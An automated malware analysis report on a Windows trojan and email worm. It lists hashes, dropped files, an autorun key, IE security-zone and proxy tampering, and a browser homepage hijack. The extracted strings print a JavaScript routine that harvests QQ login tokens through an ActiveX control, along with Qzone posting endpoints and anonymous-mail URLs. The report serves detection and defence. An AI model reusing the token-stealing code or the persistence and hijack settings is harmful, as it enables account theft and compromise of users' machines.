Gen.Variant.Strictor.1217_cfc7af3058
Gen:Variant.Strictor.1217 (B) (Emsisoft), Gen:Variant.Strictor.1217 (AdAware), Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, GenericEmailWorm.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: cfc7af30589801fb5b6100fbd33eee92
SHA1: 63097aa9845d684bc29dfea49ba82390d0ca07c0
SHA256: 39a27af5f3d54fdbdb79b940580810bf94a9e1aea94bc055ca4c1c94d613c3f8
SSDeep: 24576:j5n2o6DeKMwUoxl8OoISadjm3HQXIqJrEUMOmjPUjRbM:jgMwmOo9kSKRJrEUnmjP0
Size: 1380352 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC50, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2015-06-30 03:41:35
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
¾Ã°®¸¨Öú.exe:944
The Trojan injects its code into the following process(es):
%original file name%.exe:584
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutex
ZonesCounterMutex
ZonesCacheCounterMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
RasPbFile
ShimCacheMutex
File activity
The process %original file name%.exe:584 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHYZ412V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\K5MFCXY3\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\9ifz\¾Ã°®¸¨Öú.exe (1632 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\N4QZRPF3\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\9ifz\dlcore.dll (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\I41HJ4J3\desktop.ini (67 bytes)
The process ¾Ã°®¸¨Öú.exe:944 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Desktop\Internet Explorer.lnk (809 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\c5b88721db08c824db69d0bbc702beb8_75ed9567-aa58-4c8e-a8ea-3cad7c47ab03 (44 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Internet Explorer.lnk (815 bytes)
Registry activity
The process %original file name%.exe:584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 7E 1E 6B 11 20 46 0A 2B 81 4D 5D 57 D9 20 50"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process ¾Ã°®¸¨Öú.exe:944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Default_Search_URL" = "http://www.2345.com/?k59918823"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Search Page" = "http://www.2345.com/?k59918823"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Search Bar" = "http://www.2345.com/?k59918823"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.2345.com/?k59918823"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Start Page" = "http://www.2345.com/?k59918823"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.2345.com/?k59918823"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Local Page" = "http://www.2345.com/?k59918823"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Default_Page_URL" = "http://www.2345.com/?k59918823"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Search Bar" = "http://www.2345.com/?k59918823"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.2345.com/?k59918823"
"Default_Page_URL" = "http://www.2345.com/?k59918823"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F F3 78 B7 89 35 F1 2C BB CC 4B EC 42 2D AA 29"
[HKCU\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage]
"Command" = "%Program Files%\Internet Explorer\iexplore.exe http://www.2345.com/?k59918823"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Search Page" = "http://www.2345.com/?k59918823"
"Default_Page_URL" = "http://www.2345.com/?k59918823"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Use_Async_DNS" = "http://www.2345.com/?k59918823"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"½ûÖ¹ºó¿ÉÄÜ»áÑÃÂÖØÓ°ÃÂìõóµÄÎȶ¨ÃÂÃâ€Ã‚£Â¬Â½Â¨Ã’é²»Òª½ûÖ¹£¡" = "%Documents and Settings%\%current user%\Application Data\9ifz\¾Ã°®¸¨Öú.exe"
Dropped PE files
| MD5 | File path |
|---|---|
| 66504b12f4f8f5b70a8574e0370937a4 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\9ifz\dlcore.dll |
| 4e636c45b40b2ff461e786206e74ce55 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\9ifz\¾Ã°®¸¨Öú.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 606710 | 610304 | 4.5393 | a5447e93e825d09573b62f74f55725fe |
| .rdata | 614400 | 654016 | 655360 | 4.5704 | 3691855c2e0dced4d96cc1fef92a8f52 |
| .data | 1269760 | 187208 | 73728 | 3.51461 | 51f92e5c7c9b6e604fd6e1384f0bba44 |
| .rsrc | 1458176 | 33536 | 36864 | 3.24504 | ff3013ea99dc8aca07048f5c9fe5c3d6 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://captcha.qq.com/getimage?aid=1007901&r=0.8991660715926585 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY Unsupported/Fake Windows NT Version 5.0
Traffic
GET /getimage?aid=1007901&r=0.8991660715926585 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: captcha.qq.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: tencent http server
Accept-Ranges: bytes
Pragma: No-cache
P3P: CP=CAO PSA OUR
Content-Length: 1662
Set-Cookie: verifysession=h01b15ac50ade777dac301024403ae7083c0eb98bcac15a7b5305e83b2819fbfc807475158e07e26a5f; PATH=/; DOMAIN=qq.com;
Connection: close
Content-Type: image/jpeg......JFIF............."f4a1b3c....F.......F....w.A........C..........
......(.....1#%.(:3=<9387@H\N@DWE78PmQW_bghg>Mqypdx\egc...C.....
../../cB8Bcccccccccccccccccccccccccccccccccccccccccccccccccc......5...
."............................................................}.......
.!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdef
ghijstuvwxyz..........................................................
....................................................................w.
......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVW
XYZcdefghijstuvwxyz...................................................
.................................?..|..|...wc..Tnw.........q..9....Z.i
%E....8...q.H.m....g..>..)!kR..G...`r.p>..n...A.#...TL.q>..K{
. gk..........Y...,...#.....RX\Ird.......O....5-...U.....X..6...O8=..
n.q#.....,.........j...5..P9.,.J:...#..~4..$E.t..{*......g...-.9.S<
..O..F/...&...e.......6..,Z...e.dB.......T.GLc/.e ..6...0.......up..((
(...(......ko1.^&...J.]Z0F H...*R......8.w....t~....4...#.......1..e#.
c....E...J....*.....j....b...c....LB.JX`./...A)l..V.{l>.,.{.....~..
.r.6...w...........W..f.M..9B....G...t[..2I ..I.7......?.@.^.R.......w
.....i..Z...."....@...........:". ~jMAsn..k<..!;[email protected]..
D.......,..yA...s...um..C.........I}v.V.h....-.....$mJ...r.[n.I......e
/<o.x... .?...~..^K..2L...qT..F.......l....x.2ra..@.=.3s.....\.G2..
..MY.f.Kh...l.x. .9#...A.].aE.PPQE..UK....i....:.......m.._...T..8rf..
L...Y.U.~F.$...Rbm.....-s...d..P...!F9.....}.u*FV$#.W..S..~5r..]..<<< skipped >>>
The Trojan connects to the servers at the folowing location(s):
.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
atl.dll
wininet.dll
user32.dll
kernel32.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
MsgWaitForMultipleObjects
GetWindowsDirectoryA
hXXp://captcha.qq.com/getimage?aid=1007901&r=0.8991660715926585
[email protected]
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
skey
#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm
qzreferrer=http://user.qzone.qq.com/
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=
hXXp://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=
hXXp://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
&secverifykey=28Q12062209183668_2209183668
&source=1&blogType=0&lp_type=0&lp_flag=0&lp_id=79208&lp_style=16843520&autograph=1&topFlag=0&feeds=1&tweetFlag=0&rightType=1&uin=
&html=qzreferrer=http://cnc.qzs.qq.com/qzone/newblog/v5/editor.html#opener=refererurl&source=1&refererurl=http%3A%2F%2Fcnc.qzs.qq.com%2Fqzone%2Fapp%2Fblog%2Fv6%2Fbloglist.html%23nojump%3D1%26page%3D1%26catalog%3Dlist&cate=hXXp://b11.cnc.qzone.qq.com/cgi-bin/blognew/add_blog?g_tk=SSOAxCtrlForPTLogin.SSOForPTLogin2hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogindocument.body.innerHTML=GetuinKey();function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)http=httpsHTTP/1.1Content-Type: application/x-www-form-urlencodedhXXps://hXXp://len = str.length; i < len; i) hash = (hash << 5) str.charCodeAt(i);var t = QZONE.FormSender;if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {var a = QZFL.string.trim(fm.action);a = (a.indexOf("?") > -1 ? "&": "?") "g_tk=" QZFL.pluginsDefine.getACSRFToken();fm.action = a\dlcore.dll.relocGetProcessHeapKERNEL32.dllCryptDeriveKeyCryptDestroyKeyRegCloseKeyRegCreateKeyExARegOpenKeyAADVAPI32.dllSHELL32.dllUSER32.dllSHLWAPI.dllole32.dllMSVCRT.dlldlcore.dllhXXp://VVV.2345.com/?k59918823VVV.9ifz.org3|CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command|"%Program Files%\Internet Explorer\iexplore.exe" hXXp://VVV.2345.com/?k599188233|Software\Microsoft\Internet Explorer\Main\Start Page|hXXp://VVV.2345.com/?k599188233|Software\Microsoft\Internet Explorer\Main\Default_Page_URL|hXXp://VVV.2345.com/?k599188233|Software\Policies\Microsoft\Internet Explorer\Main\Default_Page_URL|hXXp://VVV.2345.com/?k599188233|Software\Policies\Microsoft\Internet Explorer\Main\Search Bar|hXXp://VVV.2345.com/?k599188233|Software\Policies\Microsoft\Internet Explorer\Main\Search Page|hXXp://VVV.2345.com/?k599188233|Software\Policies\Microsoft\Internet Explorer\Main\Start Page|hXXp://VVV.2345.com/?k599188234|SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\Default_Page_URL|hXXp://VVV.2345.com/?k599188234|SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\Default_Search_URL|hXXp://VVV.2345.com/?k599188234|SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\Use_Async_DNS|hXXp://VVV.2345.com/?k599188234|SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\Search Bar|hXXp://VVV.2345.com/?k599188234|SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\Search Page|hXXp://VVV.2345.com/?k599188234|SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\Local Page|hXXp://VVV.2345.com/?k599188234|SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\Start Page|hXXp://VVV.2345.com/?k599188234|SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\Start Page|hXXp://VVV.2345.com/?k599188234|SOFTWARE\Microsoft\Internet Explorer\MAIN\Start Page|hXXp://VVV.2345.com/?k599188235|S-1-5-21-3053028586-37942918-3155121407-500\Software\Microsoft\Internet Explorer\Main\Start Page|hXXp://VVV.2345.com/?k59918823*.lnk1027663760iexplore.exe,Internet Explorersogouexplorer.exe,Firefox.exe,opera.exe,opera360se.exe,360chrome.exe,google360chrome.exe,360baidubrowser.exe,QQbrowser.exe,QQleibao.exe,2345Explorer.exe,23452345Chrome.exe,2345firefox.exe,maxthon.exe,Juzi.exe,taobrowser.exe,yybrowser.exe,YYyyexplorer.exe,YYhttp\shell\open\command\advapi32.dllshlwapi.dllprogram internal error number is %d.:"%s":"%s"..ndata@.reloc;~TtCPFtPjRegDeleteKeyExWKernel32.DLLPSAPI.DLLoperatorGetProcessWindowStation127.0.0.10.0.0.0,%u,%u,%u,%u,%u,%u,%u,%u,%u,%u,%u,%u,%u,%u,%uupload_data.qq.com121.14.102.16COMM:%u,%u,%u,%I64u,%I64u,%d,%d,%d,%d,%d,%d,%d,%d,%d,0,0,0,0,0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows Xp)Host: %s:%d(%d) d:d:d.d000 %s: %spdlxf.qq.comfs-tcp-conn.qq.comstun.qq.comxuanfengnet.qq.comfs-hello.qq.comfs-conn.qq.comfs-h2u.qq.comfs-report.qq.comR:\TempView\Misc\Setup3\build\Release\QQSetupEx.pdbWS2_32.dllNETAPI32.dllVERSION.dllCreatePipeGetWindowsDirectoryWGDI32.dllRegOpenKeyExWRegCreateKeyWRegDeleteKeyWRegEnumKeyWRegCreateKeyExWSHFileOperationWShellExecuteExWShellExecuteWCryptCATCatalogInfoFromContextWTHelperGetProvCertFromChainWINTRUST.dllCertGetNameStringWCRYPT32.dllGetCPInfo.?AVCVideoMsg@@zcÁ^SQLS^'%cMMV#)Hummer Backup Setup EXE<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel><!-- Windows 8.1 --><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><!-- Windows Vista --><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/><!-- Windows 7 --><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><!-- Windows 8 --><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>5;7,8084888<8@8>#> ><>[>?#?-?2?7?5_5X5o57&8 80888>#>(>->7>?)?.?3?=?0'1?1.6:64!4%4)4-47|7g7? ?$?(?,?0?6 6$6(6,60646Thawte Certification1hXXp://ocsp.thawte.com0.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0hXXp://ts-ocsp.ws.symantec.com07hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(.Class 3 Public Primary Certification Authority0<VeriSign Class 3 Public Primary Certification Authority - G50hXXp://crl.verisign.com/pca3.crl0hXXps://VVV.verisign.com/cps0#hXXp://logo.verisign.com/vslogo.gif04hXXp://ocsp.verisign.com0>2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0DhXXps://VVV.verisign.com/rpa0hXXp://ocsp.verisign.com0;/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0hXXps://VVV.verisign.com/cps0*#hXXp://crl.verisign.com/pca3-g5.crl04hXXp://ocsp.verisign.com0[email protected]_r=请输入邮箱地å€ï¼Œå¦‚[email protected]_s=_t=&type=anonymous&arg=f=hXXp://tool.chacuo.net/mailanonymous/Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 2Pac; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)%S4WDhg%fpMS.Ac9SR0.I%3s,wAe.kIaiUy'4xu%c*@j.eH'y{&%U)lj%4Uxe%CNs9F.cLehJK.ZHO.qt0KERNEL32.DLLCOMCTL32.dllMSIMG32.dllMSVFW32.dllSkinH_EL.dll@atl.dllg<n.Vil#7l%x(.eYQ%l%d&&'12345678900003333deflate 1.1.3 Copyright 1995-1998 Jean-loup Gaillyinflate 1.1.3 Copyright 1995-1998 Mark AdlerF%*.*fCNotSupportedExceptioncommctrl_DragListMsgAfx:%x:%x:%x:%x:%xAfx:%x:%xCOMCTL32.DLLCCmdTarget__MSVCRT_HEAP_SELECTBroken pipeInappropriate I/O control operationOperation not permittedRASAPI32.dllWinExecGetKeyStateGetViewportOrgExWINMM.dllWINSPOOL.DRVRegOpenKeyExAShellExecuteAOLEAUT32.dllInternetCrackUrlAInternetCanonicalizeUrlAWININET.dllCreateDialogIndirectParamAUnhookWindowsHookExSetWindowsHookExASetViewportOrgExOffsetViewportOrgExSetViewportExtExScaleViewportExtExGetViewportExtExcomdlg32.dll.PAVCException@@.PAVCNotSupportedException@@.PAVCFileException@@(*.prn)|*.prn|(*.*)|*.*||Shell32.dllMpr.dllAdvapi32.dllUser32.dllGdi32.dllKernel32.dll(&07-034/)7 '?? / %d]%d / %d]: %d](*.WAV;*.MID)|*.WAV;*.MID|WAV(*.WAV)|*.WAV|MIDI(*.MID)|*.MID|(*.txt)|*.txt|(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG(*.JPG)|*.JPG|PNG(*.PNG)|*.PNG|BMP(*.BMP)|*.BMP|GIF(*.GIF)|*.GIF|(*.ICO)|*.ICO|(*.CUR)|*.CUR|%s:%dwindows1.6.9unsupported zlib versionpng_read_image: unsupported transformationout.prn%d.%d%d / %d%d/%dBogus message code %dlibpng error: %slibpng warning: %s1.1.3bad keywordlibpng does not support gamma background rgb_to_grayPalette is NULL in indexed image(%d-%d):%ld%cMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)HTTP/1.0%s <%s>Reply-To: %sFrom: %sTo: %sSubject: %sDate: %sCc: %s%a, %d %b %Y %H:%M:%SSMTP.PAVCObject@@.PAVCSimpleException@@.PAVCMemoryException@@.?AVCNotSupportedException@@.PAVCResourceException@@.PAVCUserException@@.?AVCCmdTarget@@.?AVCCmdUI@@.?AVCTestCmdUI@@.PAVCArchiveException@@c:\%original file name%.exe#include "l.chs\afxres.rc" // Standard components<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>Software\Microsoft\Windows\CurrentVersion*?|<>/":invalid registry keyHKEY_DYN_DATAHKEY_CURRENT_CONFIGHKEY_PERFORMANCE_DATAHKEY_USERSHKEY_LOCAL_MACHINEHKEY_CURRENT_USERHKEY_CLASSES_ROOTRMDir: RemoveDirectory failed("%s")RMDir: RemoveDirectory("%s")RMDir: RemoveDirectory invalid input("%s")Delete: DeleteFile failed("%s")Delete: DeleteFile("%s")install.logSection: "%s".DEFAULT\Control Panel\Internationallogging set to %dsettings logging to %dWriteReg: error creating key "%s\%s"WriteReg: error writing into "%s\%s" "%s"WriteRegDWORD: "%s\%s" "%s"="0xx"WriteRegExpandStr: "%s\%s" "%s"="%s"WriteRegStr: "%s\%s" "%s"="%s"DeleteRegKey: "%s\%s"DeleteRegValue: "%s\%s" "%s"WriteINIStr: wrote [%s] %s=%s in %sCopyFiles "%s"->"%s"Exec: failed createprocess ("%s")Exec: success ("%s")Exec: command="%s"ExecShell: success ("%s": file:"%s" params:"%s")ExecShell: warning: error ("%s": file:"%s" params:"%s")=%dExch: stack < %d elementsRMDir: "%s"MessageBox: %d,"%s"Delete: "%s"Rename failed: %sRename: %sIfFileExists: file "%s" does not exist, jumping %dIfFileExists: file "%s" exists, jumping %dCreateDirectory: "%s" createdCreateDirectory: can't create "%s" - a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (%d)SetFileAttributes: "%s":XSleep(%d)detailprint: %sCall: %dAborting: "%s"Jump: %dHKERNEL32.DLLmscoree.dll- Attempt to initialize the CRT more than once.- CRT not initialized- floating point support not loadedWUSER32.DLLhXXp://dldir1.qq.com/qqfile/qq/plugin/setuppkg.7z.output_TX~QQSetupEx~0503~A1C22B84-CE8D-437A-AA60-6D3ABCB18ACFRCreateWindowsDirTempR:\TempView\Misc\Setup3\BackupDownloader\BackupDownload.cppcreate folder :%s error, errcode:%ludir:%sParseCmdLine`anonymous-namespace'::ParseCmdLinecmd 